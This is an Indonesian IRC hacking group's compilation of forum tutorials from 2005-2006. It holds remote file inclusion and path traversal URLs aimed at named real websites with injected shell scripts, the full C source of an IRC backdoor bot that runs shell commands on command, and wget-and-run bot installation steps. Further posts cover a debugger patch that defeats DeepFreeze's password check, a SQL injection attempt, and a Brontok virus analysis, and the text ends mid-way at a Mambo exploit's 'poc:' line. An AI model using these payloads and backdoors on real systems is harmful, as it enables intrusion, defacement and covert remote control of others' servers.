TUTORIAL HACKING

KOMUNITAS #SOLOHACKERLINK
ALLnet + Dalnet

5
Kumpulan tutorial ini kami persembahkan bagi anda yang pingin belajar Hacking, Defacing, Cracking, dan yang berhubungan dengan dunia Komputer. Tapi Ingat Kami Tidak Bertanggung Jawab Atas Penyalah Gunaan Artikel Ini. -ChanServChannel: #solohackerlink -ChanServFounder: PeNcOpEt_CiNtA, last seen: 5 days (0h 40m 1s) ago -ChanServ- Successor: POM_PONK << ONLINE >> -ChanServ- Registered: 2 years 24 weeks 2 days (1h 31m 55s) ago (2003) -ChanServ- Last Used: 0 seconds ago -ChanServTopic: [ www.solohackerlink.cool.to Kirimkan tutorial k-mu disini ] Selamat Menunaikan Ibadah Syaum -ChanServEmail: solohackerlink@gmail.com -ChanServUrl: www.solohackerlink.s.to -ChanServOptions: TopicLock, SecureOps, Private, SplitOps, Verbose -ChanServ- Mode Lock: -i

Weblog instal Bug
####################################################################### # # Indonesian Newbie Class ( Paper ) # # By iDiots http://idiots.madpage.com # # idiots@Amunisi.Info

# ####################################################################### # Weblog instal Bug ####################################################################### # # Thank´s For all My Friend at #NeRaka #kartubeben #solohackerlink # Pa n ma, My brother n siterzzzz # Keluarga besar, My DD Jelex/Tari, Aini, teteh Tika n papa n mama (Terimakasih dah mau ngangkat gw anak..) # ####################################################################### ( catatan Kata kata Ini di pak lek kopi paste dari artikelnya pak de POM_PONK karna males ngetik nya... Ho..Hoo..Ho......) Buat kalian yang ingin belajar BUG disinilah tempatna. Babahe mo jelasin cara Ebug Website kita gunakan tradisi seperti yang di lakukan sesepuh hacking kita yaitu buka www.google.com dan masukkan keyword sebagai berikut:

Keyword: allinurl: weblog/install/index.php?lng=* ex: - 1st iDiots php.ini : magic_quotes_gpc = Off http://amunisi.info/weblog/install/index.php?lng=../../../../../../etc/passwd%00

- 2nd iDiots php.ini : magic_quotes_gpc = On http://amunisi.info/weblog/install/index.php?lng=../../phpinfo - 3rd iDiots php.ini : allow_url_fopen = On http://amunisi.info/weblog/install/index.php?lng=../../include/main.inc&G_PATH=http://[hacker]

-------------------------------iDiots From Hell http://idiots.Madpage.com idiots@Amunisi.Info --------------------------------

Post by : iDiots on [ 30 January 2006 22:47:18 ]

BoDyFile PHP injection
####################################################################### # # Indonesian Newbie Class ( Paper ) # proxy grabber # By iDiots http://idiots.madpage.com # # idiots@Amunisi.Info # ####################################################################### # bodyfile PHP injection ####################################################################### # # Thank´s For all My Friend at #NeRaka #kartubeben #solohackerlink # Pa n ma, My brother n siterzzzz

# Keluarga besar, My DD Jelex/Tari, Aini, teteh Tika n papa n mama (Terimakasih dah mau ngangkat gw anak..) # ####################################################################### ( catatan Kata kata Ini di pak lek kopi paste dari artikelnya pak de POM_PONK karna males ngetik nya... Ho..Hoo..Ho......) Buat kalian yang ingin belajar inject disinilah tempatna. Babahe mo jelasin cara menginject folder.php kita gunakan tradisi seperti yang di lakukan sesepuh hacking kita yaitu buka www.google.com dan masukkan keyword sebagai berikut:

Keyword: allinurl: .php?bodyfile= ex: http://Amunisi.Info/kontol.php?bodyfile=http://idiots.name/mandul.jpg? Ho..Ho...Ho.. selanjutnya terserah anda.. pokoke sama ama inject inject yg laen...

-------------------------------iDiots From Hell http://idiots.Madpage.com idiots@Amunisi.Info --------------------------------

Post by : iDiots on [ 30 January 2006 22:43:51 ]

Inject Again......
####################################################################### # # Indonesian Newbie Class ( Paper ) # proxy grabber # By iDiots http://idiots.madpage.com # # idiots@linuxmail.org # ####################################################################### # Inject Again...... ####################################################################### # # Thank´s For all My Friend at #NeRaka #kartubeben #solohackerlink # Pa n ma, My brother n siterzzzz # Keluarga besar, My DD Jelex/Tari, Aini, teteh Tika n papa n mama (Terimakasih dah mau ngangkat gw anak..) # ####################################################################### ( catatan Kata kata Ini di pak lek kopi paste dari artikelnya pak de POM_PONK karna males ngetik nya... Ho..Hoo..Ho......) Buat kalian yang ingin belajar inject disinilah tempatna. Babahe mo jelasin cara menginject folder.php kita gunakan tradisi seperti yang di lakukan sesepuh hacking kita yaitu buka www.google.com dan masukkan keyword sebagai berikut:

Keyword: allinurl: uptime3?pin=

http://uptime.alertra.com/uptime3?pin=http://idiots.name/mandul.jpg? Ho..Ho...Ho.. selanjutnya terserah anda.. pokoke sama ama inject inject yg laen...

-------------------------------iDiots From Hell http://idiots.Madpage.com idiots@Amunisi.Info --------------------------------

Post by : iDiots on [ 30 January 2006 22:41:03 ]

Perl Bot IRC
Hello disini saya mau kasih sedikit script yang saya punya, yaitu script perl irc bot. Disini fungsi bit bisa menjalankan perintah lewat mirc, contoh nyata bot Pencopet_Cinta. Jadi botnya bisa berfungsi sebagai backdoor heheee bingung dah gw, soalnya script punya wong bule randyy cuma edit doank. ok mulai aza langsung yah : ___ script mulai dari bawah ____ #include <stdio.h> #include <sys/time.h> #include <sys/types.h> #include <sys/socket.h> #include <unistd.h> #include <sys/select.h> #include <netinet/in.h> #include <arpa/inet.h> #include <netdb.h>

#include <string.h> #include <stdarg.h> #define MASTER "randyy@161.subnet234.astinet.telkom.net.id" #define HIDE "randyy" #define MAX_NICK 15 #define MAX_SERVER 512 #define NAMA "solohackerlink_bot" #define CHAN "solohackerlink" struct info { char server[256]; int port; char nick[MAX_NICK]; char chan[200]; char key[64]; }; int setupsock(char *host, int port); int parse_server(char *buf); void parse_channel(char *buf); void send_req(FILE *ircfd, struct info bot); void main_loop(FILE *ircfd, struct info bot); void exec(FILE *ircfd, char *command, char *nick); char *remove_cr_nl(char *str); void sendirc(FILE *ircfd, char *format, ...); char *remove_cr_nl(char *str) { int i; for (i=0;i<strlen(str);i++) if (str == ´ ´ || str == ´ ´) str = ´´; return str; } void sendirc(FILE *ircfd, char *format, ...) { char buf[MAX_SERVER] = "";

va_list args; va_start(args, format); vsnprintf(buf, sizeof(buf), format, args); fprintf(ircfd, buf); va_end(args); } void exec(FILE *ircfd, char *command, char *nick) { char buf[1024] = ""; FILE *sys; snprintf(buf, sizeof(buf), "export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/bin/var/tmp;%s", command); sys = popen(buf, "r"); while (fgets(buf, sizeof(buf), sys)) { sendirc(ircfd, "NOTICE %s :%s ", nick, buf); memset(buf, 0, sizeof(buf)); sleep(1); } pclose(sys); } void main_loop(FILE *ircfd, struct info bot) { char buf[MAX_SERVER], nick[MAX_NICK], host[256], cmd[MAX_NICK], arg1[356], useless[32], what[128]; int i, j, buflen; while (fgets(buf, MAX_SERVER, ircfd)) { memset(nick, 0, MAX_NICK); memset(host, 0, sizeof(host)); memset(useless, 0, sizeof(useless)); memset(what, 0, sizeof(what)); memset(cmd, 0, sizeof(cmd));

memset(arg1, 0, sizeof(arg1)); buflen = strlen(buf); for (i=0;i<buflen && buf != ´ ´;i++) if (buf == ´!´) goto user; for (i=j=0;i<buflen && buf != ´ ´ && j<sizeof(useless);i++) useless[j++] = buf; if (!strcmp(useless, "PING")) { for (i++,j=0;i<buflen && buf != ´ ´ && buf != ´ ´ && j<sizeof(what);i++) { if (buf == ´:´) continue; what[j++] = buf; } } else continue; sendirc(ircfd, "PING %s ", remove_cr_nl(what)); continue; user: for (i=j=0;i<buflen && buf != ´!´ && j<MAX_NICK;i++) { if (buf == ´:´) continue; nick[j++] = buf; } for (j=0;i<buflen && buf != ´ ´ && j<sizeof(host);i++) { if (buf == ´!´) continue; host[j++] = buf; } for (j=0,i++;i<buflen && buf != ´ ´ && j<sizeof(useless);i++) useless[j++] = buf; if (strcmp(useless, "PRIVMSG"))

continue; for (;i<buflen;i++) { if (buf == ´:´) { for (j=0,i++;i<buflen && j<sizeof(cmd) && buf != ´ ´;i++) cmd[j++] = buf; break; } } for (j=0,i++;i<buflen && j<sizeof(arg1) && buf != ´ ´;i++,j++) arg1[j] = buf; #ifdef MASTERONLY if (strcmp(host, MASTER)) continue; #endif if (strstr(cmd, "!exec")) { if (!strlen(arg1)) sendirc(ircfd, "NOTICE %s :becanda yah om ? ", nick); else exec(ircfd, arg1, nick); } else if (strstr(cmd, "!exit")) { sendirc(ircfd, "QUIT :berkorban demi randyy "); break; } } // while } int parse_server(char *buf) { char *parse, tmp[8] = ""; int i, k = 0; /* avoid from access voliation */ if ((parse = strchr(buf, ´ ´))) { if (!strchr(parse+1, ´ ´)) return 0; } else

return 0; /* numeric replies */ for (i=0;buf != ´ ´;i++); do { tmp[k++] = buf[i++]; } while (buf != ´ ´); return atoi(tmp); } void send_req(FILE *ircfd, struct info bot) { int server = 0; char *buf; buf = (char *)malloc(sizeof(char)*MAX_SERVER); if (!buf) exit(0); memcpy(bot.nick, NAMA, sizeof(bot.nick)); sendirc(ircfd, "USER %s * * :Powered by Randyy ", bot.nick); sendirc(ircfd, "NICK %s ", bot.nick); while (fgets(buf, MAX_SERVER, ircfd)) { server = parse_server(buf); if (server == 433) { memcpy(bot.nick, NAMA, sizeof(bot.nick)); sendirc(ircfd, "NICK %s ", bot.nick); } else if (server == 376) sendirc(ircfd, "JOIN #%s %s ", bot.chan, bot.key); else if (server == 465) { printf("{-} You are banned from this server "); exit(0); } else if (server == 432) { memcpy(bot.nick, NAMA, sizeof(bot.nick)); sendirc(ircfd, "NICK %s ", bot.nick);

} else if (server == 366) break; } free(buf); } int setupsock(char *host, int port) { struct sockaddr_in remote; struct hostent *hp; int sock; if (!(hp = gethostbyname(host))) { printf("{-} host not found "); return -1; } memset((char *)&remote, 0, sizeof(remote)); remote.sin_family = AF_INET; remote.sin_port = htons(port); memcpy((char *)&remote.sin_addr, hp->h_addr, hp->h_length); if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) { printf("{-} cannot create socket "); return -1; } if (connect(sock, (struct sockaddr *)&remote, sizeof(remote)) < 0) { printf("{-} connection refused (%d) ", port); return -1; } return sock; } int main(int argc, char *argv[]) { struct info bot; int i = 0, sd; FILE *ircfd;

if (argc < 2) { printf("{+} usage: %s <server:port> [ch_key] ", argv[0]); return 0; } if (!strchr(argv[1], ´:´)) { printf("{-} Wrong server syntax. "); return -1; } memcpy(bot.server, strtok(argv[1], ":"), sizeof(bot.server)); for (i=0;i<strlen(argv[1]);i++) if (argv[1] == ´:´) break; if (argv[1][i+1] == ´´) { printf("{-} go away kid "); return -1; } bot.port = atoi(strtok(NULL, "")); memcpy(bot.chan, CHAN, sizeof(bot.chan)); if (argv[3]) memcpy(bot.key, argv[2], sizeof(bot.key)); else memcpy(bot.key, "key", strlen("key")); if ((sd = setupsock(bot.server, bot.port)) < 0) return -1; ircfd = fdopen(sd, "r+"); setbuf(ircfd, NULL); send_req(ircfd, bot); printf("{+} Connected "); if (fork()) exit(0); for (i=0;i<argc;i++)

memset(argv, 0, strlen(argv)); memcpy(argv[0], HIDE, strlen(HIDE)); main_loop(ircfd, bot); close(sd); fclose(ircfd); return 0; } ___ ok selesai bos___ cara jalanin perinta lewat mirc tinggal pake commands !exec. contohnya !exec uname -a terus !exit untuk quit bot. heheheee segitu aza yah ntar tinggal di edit aza sendiri kalo mau dikasih yang lain-lainnya.

Post by : randyy on [ 19 January 2006 10:09:24 ] Reply no: 1 sorry ada yang lupa kalo mau nick botnya mau yang panjang tambahin nilai MAX_NICK ke bilangan yang lebih besar. heheheheh ini pesanan dari hikaru katanya dikasih tantangan dari mas saleho.

Reply by : randyy on [ 19 January 2006 10:15:27 ]

Injection for folder.php
Ahai...... babahe back Buat kalian yang ingin belajar inject disinilah tempatna.

Babahe mo jelasin cara menginject folder.php kita gunakan tradisi seperti yang di lakukan sesepuh hacking kita yaitu buka www.google.com dan masukkan keyword sebagai berikut: "allinurl:/folder.php?id= australia" Ambil salah satu target hasil pencarian, sebagai contoh: http://www.nemet.org.uk/resources/folder.php

Setelah itu siapin inject ini: /classes.php?LOCAL_PATH=http://geocities.com/solohackerlinks/script/pomponk.txt? Dan sekarang gabungin antara target dengan scripts inject yang telah kita siapkan, jadina begini: http://www.nemet.org.uk/resources/classes.php?LOCAL_PATH=http://geocities.com/solohackerli nks/script/pomponk.txt? nah kalo berhasil akan kita dapati tampilan web seperti ini. January 15, 2006 POM_PONK on #SOLOHACKERLINK POM_PONK on Allnetwork and Dalnet, WAS HERE !!!! ::. This Is The Server Information

sysname: Linux nodename: white.phurix.com release: 2.4.21-9.0.3.EL version: #1 Tue Apr 20 19:54:32 EDT 2004 machine: i686 User Info: uid=99(nobody) euid=99(nobody) gid=99(nobody) Current Path: /home/nemet/public_html/resources Permission Directory: Yes Server Services: Apache/1.3.34 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 PHP/4.4.1 FrontPage/5.0.2.2635 mod_ssl/2.8.25 OpenSSL/0.9.7a

Server Adress: 67.19.3.162 www.nemet.org.uk Script Current User: nemet PHP Version: 4.4.1 Masukkan cOmmand uNix : cmd :

--------------------------------------------------------------------------------

-------------------------------------------------------------------------------POM_PONK Tak Mudah Tembus Tak Mudah Berkerut -------------------------------------------------------------------------------#Solohackerlink , #jambihackerlink, #powhack , #Pekalonganhackerlink , #Malanghackerlink , #indonesiahack , any room in

Nah... kalo dah kek getu tinggal masukin command UNIX di kolom cmd: OK dee.... met mencubak bagi kalian yang belon tau bagi yang dah tau, mohon bimbingan dan pencerahanna trim´s teman2 #SOLOHACKERLINK

by: POM_PONK #SOLOHACKERLINK thank´s to PeNcOpEt_CiNtA

Post by : POM_PONK on [ 15 January 2006 13:42:45 ]

bugs PHP AllMyGuests
sorry kalo basi !!! buka om google keyword : allinurl:/modules.php?name=allmyguests bug : /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=[inject] contoh : http://www.sta-dortmund.de/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath] =http://geocities.com/i13unk/toolx/hai.txt?

Post by : pinguingilo on [ 08 January 2006 08:24:46 ] 202

Anti Virus Kangen
Anti virus ini diciptakan untuk menanggulangi virus kangen. Jadi lebih baik sebelum PC anda terinfeksi virus tersebut, instal aja buat jaga-jaga (mencegah lebih baik daripada mengobati) tul gak Sobat..!!!! Cara kerjanyapun ringan dan efektif banget. Virus tersebut buatan anak UGM Untuk windows 98, Instal dulu VBRUN60 yahc... ok deh. Kamu-kamu bisa ambil anti virus kangen di http://www.geocities.com/dku_dk/antikangen.zip moga aja berguna

Post by : paparazzi on [ 05 January 2006 17:53:04 ] 202

SQL injection bantuin
http://www.rileks.com/netstudent/kisah/detail_curhat.cfm?Id=1119´having%201-1 trus muncul erro gini : Oracle Error Code = 1722 ORA-01722: invalid number

SQL = "Select * From tbsk_kisah where cat_id = ´20´ and art_ks_id = ´1119´´having 1-1´" Data Source = "BISIKDEV"

The error occurred while processing an element with a general identifier of (CFQUERY), occupying document position (2:1) to (2:68).

Date/Time: 12/31/05 20:59:50 Browser: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98) Remote Address: 202.133.82.236 Query String: Id=1119´having%201-1 trus digimanain bingung?

Post by : s0me0ne on [ 31 December 2005 12:56:35 ]

JuRuS MeMbaNtai DeEpFrEeZe
WaRniG:.....hehehheheh....... SaMuR4i_X tidak bertanggung jawab akan kerusakan atau kerugian yang ditimbulkan akibat penggunaan ataupun pelaksanaan tutorial ini. Tutorial ditujukan untuk mereka yang mau belajar bukan untuk mereka yang ingin merusak bahkan merugikan orang lain dengan tindakannya.Anyway, Let´s Get It on!!!! muachhhhhhhhhhh.................hehehe... $>DeepFreeze adalah salah satu Software yang digunakan untuk mengamankan, mencegah dan mengontrol komputer dari pengerusakan yang dilakukan sengaja ataupun tidak sengaja. Sesuai dengan namanya software ini akan "Membekukan" segala yang ada di partisi "beku"nya. Tidak ada "Restriction" dalam penggunaan komputer yang "dibekukan", hanya saja semua settingan, dan kondisi komputer akan kembali seperti semula setelah komputer di-restart / booting. kan sebel kalo teman2 yang masih suka deface maka hasil defacesannya gak akan bertahan lama soalna adminna tinggal restart langsung beres.heheheh.............hehe... $>Tutorial ini akan membahas tentang cara Disable/Un-freeze DeepFreeze versi 4.20.020.0598, 4.20.120.0598, 4.20.121.0613, 5.20.220.1125 dan 5.30.120.1181 pada OS Windows 2K/XP. $>Pada umumnya DeepFreeze mempunyai aplikasi yang aktif di komputer yang masih "Enable", dan bila kita ingin mengubah setingan dari DeepFreeze maka harus masuk ke menu Config yang diproteksi oleh password tentunya. $>Ada beberapa cara untuk men-Disable software ini, yaitu dengan menggunakan disket (bootable tentunya) lalu boot dari disket itu dan memindahkan file DFSERVEX.EXE yang berada di path c:progra~1hypert~1deepfr~1 ke tempat lain. Dan yang terakhir yaitu dengan menggunakan Disassembler untuk mem-Patch File Frzstate(2K).exe.

Tutorial ini akan membahas cara yang kedua. SeNjata yang diperlukan : 1.Ollydbg 1.10 > http://www.ollydbg.de/ 2.Process Explorer > http://www.sysinternals.com/ 3.Ollyscript > http://ollyscript.apsvans.com/ 4.ASPack 2.12 OEP finder script by hacnho/VCT2k4 > http://ollyscript.apsvans.com/ JuRus-JuRusnya : 1.Jalankan Process Explorer lalu lihat aplikasi Frzstate.exe atau Frzstate2k.exe yang berjalan lalu klik kanan untuk melihat propertiesnya. Catat Properties Command Linenya yang berisi path program itu dan 3 angka terakhir. contoh : C:Program FilesHyperTechnologiesDeep Freeze\_$DfFrzState.exe 1 1066917 0 << 3 angka terakhir 2.Jalankan Ollydbg 1.10 dan buka Aplikasi Frzstate(2k).exe melalui path yang sudah dicatat. Jangan lupa masukkan 3 angka terakhir di kolom Arguments. 3.Akan ada box peringatan yang muncul hiraukan saja, pada box peringatan kedua kilk No. 4.Jalankan Plug-in OllyScript dengan memb-Browse-nya di menu Options>Appearance>Plugi-in Path 5.Jalankan Script EOP di menu Plugins>Run Script>Ollyscript tentukan path dari EOP script lalu klik Open. 6.Setelah itu script akan membuka code asli. Perhatikan apakah ada ikon dfreeze di system tray (DFreeze dapat disetuntuk tidak menampilkannya),bila tidak ada klik kanan pada jendela code pilih Go to>Expression dan masukkan nilai berikut : versi 4.20.020.0598 > 40A2BE versi 4.20.120.0598 > idem versi 4.20.121.0613 > 409F4A versi 5.20.220.1125 > 40FC4A versi 5.30.120.1181 > idem dan klik Ok. Setelah itu program akan menuju ke baris tersebut. Klik kanan lagi pilih Assemble lalu isi kolom dengan ekspresi NOP dan jangan lupa checklist pilihan Fill with NOP´s lalu klik Assemble.

7.Kembali lagi ke jendela code, klik kanan untuk memilih Go to dan isi dengan nilai berikut : versi 4.20.020.0598 > 40368D versi 4.20.120.0598 > idem versi 4.20.121.0613 > 4034F5 versi 5.20.220.1125 > 4037E9 versi 5.30.120.1181 > 4037E9 lalu kilk Ok. Program akan menuju baris tersebut. Kita akan membuat sebuah BreakPoint disini. 8.Klik kanan pilih Breakpoint>Toogle, lalu tekan F9 untuk eksekusi baris tersebut. Bila benar akan muncul 2 ikon Deepfreeze pada system tray. Pilihlah salah satu ikon tersebut dan tekan Shift+dobel klik atau ctrl+Shift+Alt+F6 untuk membuka Form Login DFreeze. Isi kolom password dengan apa saja allu klik OK atau Enter. 9.Jika ikon yang kita pilih benar maka form Login tersebut seolah-olah "Membeku". Kembali ke jendela code di Ollydbg tekan F8 dan lihat jendela register di sebelah kanan, ganti isi register EAX dengan nilai 1 (dalam hexadesimal) dengan dobel klik di register tersebut. (nilai 000000000 merupakan value "False" untuk pengecekan password) 10.Tekan F9 untuk eksekusi program lagi, bila benar maka kita akan mendapatkan sebuah form Config dari DeepFreeze. berarti kalian susah bisa menggunakan Jurusna Tanpa HaRus Pake pedang samurai..hehehhehe....

Thanks to: Good SWT.dan Rasulnya. Comex ini untuk penjelasan atas pertanyaanmu bro. :) PeNcOpEt_CiNtA dan Susi_NurHidayah moga menjadi pasangan yang diridhai 4JJ1.amiiinn.. POM_PONK yang mau membantu carikan cw solo.hehhehe.... iDiots maaf klo aku ad salah bro... x`shell my Friends.muachhh... and solohackerlink-crew dal.net yang masih setia... semua temanku yang tidak bisa kusebutkan thanks all...... oh ya buat warnet yang pake DeEpFrEeZe maaf ya soalna hasil downloadku bisa kehapus klo direstart terpaksa di hajar hehehe.... becanda kok..hehehhe

Post by : SaMuR4i_X on [ 24 December 2005 16:24:09 ]

bot lagiiiiii
Membuat bot 1. wget http://geocities.com/setanbelang1/tot.tgz 2. tar -zxvf tot.tgz 3. cd .local/temp 4. ./nadya file_conf nick_bot ident ip base_chan owner;./dssl file_conf --> ./nadya 01 botku botku 99.123.345.678 chanku A-9035;./dssl 01 bila tampil ......(pid 12345) <-- semoga sudah jalan bot nya 5. di status irc --> /w botku 6. coba beberapa kali /w, bila hasilnya no such nick or channel mungkin ip nya akill try another shell bro 7. kalo /w ada hasilnya, lanjutkan dengan --> /q botku (pv ama bot nya) (nick kamu harus registered, dan udah identify) 8. di pv --> ketikkan : pass <password> auth <password> +chan <channel> 9. menambahkan tcl, kembali ke shell - melihat tcl yang tersedia --> cd scripts;ls (perhatikan tcl yg ada) - menginstal tcl --> cd ..;./tcl 01 dns.tcl;./dssl 01 - kembali ke pv bot rehash auth password -periksa di channel --> !dns yahoo.com

Post by : A-9035 on [ 21 December 2005 15:06:21 ]

CaRa BiKiN ViRus BroNtok
Mengapa membahas virus ini?,...hmm...m....sebetulnya saya tidak terlalu tertarik membahas ini, tau nggak apa yang menyebabkan saya tertarik membahasnya?...pasti nggak tau kan .....ini disebabkan beberapa hari lalu banyak kehebohan mengenai virus brontok dan sempat menginfeksi beberapa komputer teman2ku . Ok untuk mempersingkat waktu kita langsung aja Setelah dilihat struktur file dari virus tersebut ternyata pembuatan virusnya menggunakan visual basic 6.0 ops....ternyata made in vb coy....nah ini yang membuat tambah menarik. Virus ini terdiri dari 1 form da 1 Module, dengan nama Form -> BrontokForm Module -> API Dengan detail berikut: Begin VB.Form BrontokForm Caption = "Brontok.A" ForeColor = &H8000000F& ScaleMode = 1 BeginProperty Font Name = "" Size = 195323.4944

Charset = 29 Weight = 774 EndProperty Begin VB.Timer TmrBrontok Enabled = 0 ´False Interval = 2000 Left = 2160 Top = 0 Width = 57352 Height = 1 End End

Dengan nama Project: Brontok.vbp, yang disimpan pada directory: F:VPROJECTREHABRe-1BRONTOK.A Jelas sekali bahwa virus ini dibuat oleh sorang program lokal, yang mempunyai skill Menengah Keatas. Ada beberapa procedure & function yang digunakan dengan nama: Form_QueryUnload(Cancel As Integer, UnloadMode As Integer) TmrBrontok_Timer() Subr_004() CekKoneksiInternet() ManipulasiExec() Subr_007() KeluarDong() BronReg() CopyAppData() DownloadVir() StartDong() StartUp() DecTeks() MutMutex() MutCr() DownloadFile()

CekUpdate() InfekNetwork() Judul() CekRemDisk() BikinFile() GetEmailFile() CekValidMail() GetTeks() CekKar() ListMail() GetTargetMBhs() GavMailer() BrontokMail() Subr_031() DataEmail() DownMIME() FindFilesAPI() ListFileGav() InfekFile() SmallAttack() MinggirLoe() GetHostByNameAlias() StripNulls() BikinKredit() Dan beberapa fungsi Api yang digunakan anatara lain: Fungsi Baca Tulis Ke Register: Declare Function RegOpenKeyExA Lib "advapi32.dll" () Declare Function RegSetValueExA Lib "advapi32.dll" () Declare Function RegCloseKey Lib "advapi32.dll" () Declare Function RegCreateKeyExA Lib "advapi32.dll" () Declare Function Sleep Lib "kernel32" () Mendapatkan Spesial Folder: Declare Function SHGetPathFromIDList Lib "shell32.dll" () Declare Function SHGetSpecialFolderLocation Lib "shell32.dll" ()

Membaca Isi Halaman Situs: Declare Function InternetOpenA Lib "wininet.dll" () Declare Function InternetOpenUrlA Lib "wininet.dll" () Declare Function InternetReadFile Lib "wininet.dll" () Declare Function InternetCloseHandle Lib "wininet.dll" () Mendapatkan Caption Dari Sebuah Window: Declare Function GetWindowTextA Lib "user32" () Declare Function GetWindowTextLengthA Lib "user32" () Dapatkan HWND Window aktif: Declare Function GetForegroundWindow Lib "user32" () Shutdown, Reboot, LogOff Windows: Declare Function ExitWindowsEx Lib "user32" () Declare Function GetCurrentProcess Lib "kernel32" () Declare Function OpenProcessToken Lib "advapi32" () Declare Function LookupPrivilegeValueA Lib "advapi32" () Declare Function AdjustTokenPrivileges Lib "advapi32" () Mendapatkan Jenis Media yang ada spt Removable Disk, CD-Rom dll: Declare Function GetDriveTypeA Lib "kernel32" () Declare Function ShellExecuteA Lib "shell32.dll" () Declare Function RtlMoveMemory Lib "kernel32" () Winsock API: Declare Function closesocket Lib "wsock32.dll" () Declare Function connect Lib "wsock32.dll" () Declare Function htons Lib "wsock32.dll" () Declare Function inet_addr Lib "wsock32.dll" () Declare Function recv Lib "wsock32.dll" () Declare Function send Lib "wsock32.dll" () Declare Function socket Lib "wsock32.dll" () Declare Function gethostbyname Lib "wsock32.dll" () Declare Function WSAStartup Lib "wsock32.dll" () Declare Function WSACleanup Lib "wsock32.dll" () Declare Function WSAAsyncSelect Lib "wsock32.dll" ()

Fungsi yang berhubungan dengan file: Declare Function FindFirstFileA Lib "kernel32" () Declare Function FindNextFileA Lib "kernel32" () Declare Function GetFileAttributesA Lib "kernel32" () Declare Function FindClose Lib "kernel32" () dll... Terlihat jelas pada fungsi-fungsi api yang digunakan bahwa penularan virus ini brontok menggunakan beberapa cara. seperti pengiriman lewat email, pencarian nama komputer yang terhubung kejaringan dengan menyalin dirinya pada folder yang di sharing dan menyalin dirinya pada window explorer yang aktif. kalo gak salah si pembuat virus mempunyai SMTP sendiri (wah ati-ati mas ntar ketangkep) Jika dilihat kembali pada strukturnya ada beberapa kata yang di encrypt, kemungkinan berupa exploit code atau apalah namanya. hanya allah dan pembuat virus yang tau. Virus ini mempunyai fungsi ExitWindowsEx yang diimport dari file user32.dll, fungsi ini biasanya digunakan untuk mematikan windows. kayaknya sipembuat virus membuat triger yang berisi perintah mematikan/merestart komputer. Selain itu dalam struktur filenya terdapat kata-kata seperti ini: FOLDER.HTT RORO .HTT .DOC .CSV .EML .CFM .PHP .WAB .EML .TXT .HTML .HTM MY DATA SOURCES MY EBOOKS MY MUSIC MY SHAPES MY VIDEOS

MY DOCUMENT Dan ada beberapa alamat situs yang diserang, apa DDOS ya...hik..hik..tau deh. Selain itu pembuat virus mencantumkan nama: --JowoBot#VM Community -Selanjutnya coba lihat tiga fungsi api berikut: Declare Function GetWindowTextA Lib "user32" () Declare Function GetWindowTextLengthA Lib "user32" () Declare Function GetForegroundWindow Lib "user32" () Sepertinya pembuat virus memanfaatkan windowexplorer untuk memperbanyak filenya ke folder yang lain. Dengan cara membaca Caption yang terdapat pada windows aktif yang berisi nama directory/path. Dengan menggunakan 2 fungsi diatas (GetWindowTextA & GetWindowTextLengthA), Sedangkan fungsi GetForegroundWindow digunakan untuk mendapatkan Handle Window (HWND) yang sedang aktif. Jadi kesimpulannya virus ini tidak dapat menyalin dirinya kalo Caption pada windowExplorer bukan berupa Directory/Path. Sehinga si pembuat virus menonaktifkan setting pada Folder Options. Kemudian yang lebih unik lagi virus ini membaca isi halaman situs yang terbuka pada sebuah InternetExplorer dengan menggunakan fungsi: Declare Function InternetOpenA Lib "wininet.dll" () Declare Function InternetOpenUrlA Lib "wininet.dll" () Declare Function InternetReadFile Lib "wininet.dll" () Declare Function InternetCloseHandle Lib "wininet.dll" () Kalo saya tebak, sepertinya pembuat virus mencari alamat email pada halaman situs yang terbuka dan mengirimkan virus nya berdasarkan alamat email yang ditemukan pada halaman tersebut dengan kata kunci seperti mailto: ataupun @xxxx.com dll... ....Untuk membersihkannya silahkan baca selengkapnya di situs AntiVirus yang lain...he..he...maaf saya hanya membahas yang ini saja. Tapi kalo pengen menonaktifkan virus ini secara cepat, coba masuk safemode kemudian rename file MSVBVM60.dll menjadi MSVBVM60.dl_ karena virus ini membutuhkan runtime vb. Nah kalo udah gak aktif baru kita bisa hapus beberapa

registry entry dan file-file virus brontoknya. Sayang sekali virus ini tidak menggunakan program compressor, sehingga memudahkan orang untuk mengenalinya.heheuhehe.....

untuk memberantasnya silahkan download toolsnya di : http://www.pttorpana.com/bin/.../SaMuR4i_X/brontokremoval.zip semoga membantu heheehee... thanx to : PeNcOpEt CiNtA and solohackerlink.dal.net yang mulai ditinggal tapi aku akan tetap setia seperti aku mencintai gadis solo meskipun dia tidak pernah tau betapa besar cintaku.heuheuheu.... Susi Nurhidayah mudah-mudahan kau tahu bahwa ada seseorang yang sangat mencintaimu dan saya berharap kau mencintainya,karena tidak ada jaminan kau akan mendapatkan cinta seperti besarnya cinta dia terhadap kau Susi. x`shell and all friends... Vbegodotcom.

Post by : SaMuR4i_X on [ 17 December 2005 16:17:54 ]

mambu vuln
Mambo Server: Variable deregistration remote file inclusion vulnerability 11/17/2005 A vulnerability exist in globals.php when register_globals is off and allow remote code inclusion this a GLOBALS overwrite in components/com_content/content.html.php

there is the line: require_once( $GLOBALS[´mosConfig_absolute_path´] . ´/includes/HTML_toolbar.php´ ); ok da globals.php: if (!ini_get(´register_globals´)) { while(list($key,$value)=each($_FILES)) $GLOBALS[$key]=$value; while(list($key,$value)=each($_ENV)) $GLOBALS[$key]=$value; while(list($key,$value)=each($_GET)) $GLOBALS[$key]=$value; while(list($key,$value)=each($_POST)) $GLOBALS[$key]=$value; while(list($key,$value)=each($_COOKIE)) $GLOBALS[$key]=$value; while(list($key,$value)=each($_SERVER)) $GLOBALS[$key]=$value; while(list($key,$value)=@each($_SESSION)) $GLOBALS[$key]=$value; foreach($_FILES as $key => $value){ $GLOBALS[$key]=$_FILES[$key][´tmp_name´]; foreach($value as $ext => $value2){ $key2 = $key . ´_´ . $ext; $GLOBALS[$key2] = $value2; } } } da fake protect in mambo.php: if (in_array( ´globals´, array_keys( array_change_key_case( $_REQUEST, CASE_LOWER ) ) ) ) { die( ´Fatal error. Global variable hack attempted.´ ); } if (in_array( ´_post´, array_keys( array_change_key_case( $_REQUEST, CASE_LOWER ) ) ) ) { die( ´Fatal error. Post variable hack attempted.´ ); } poc: 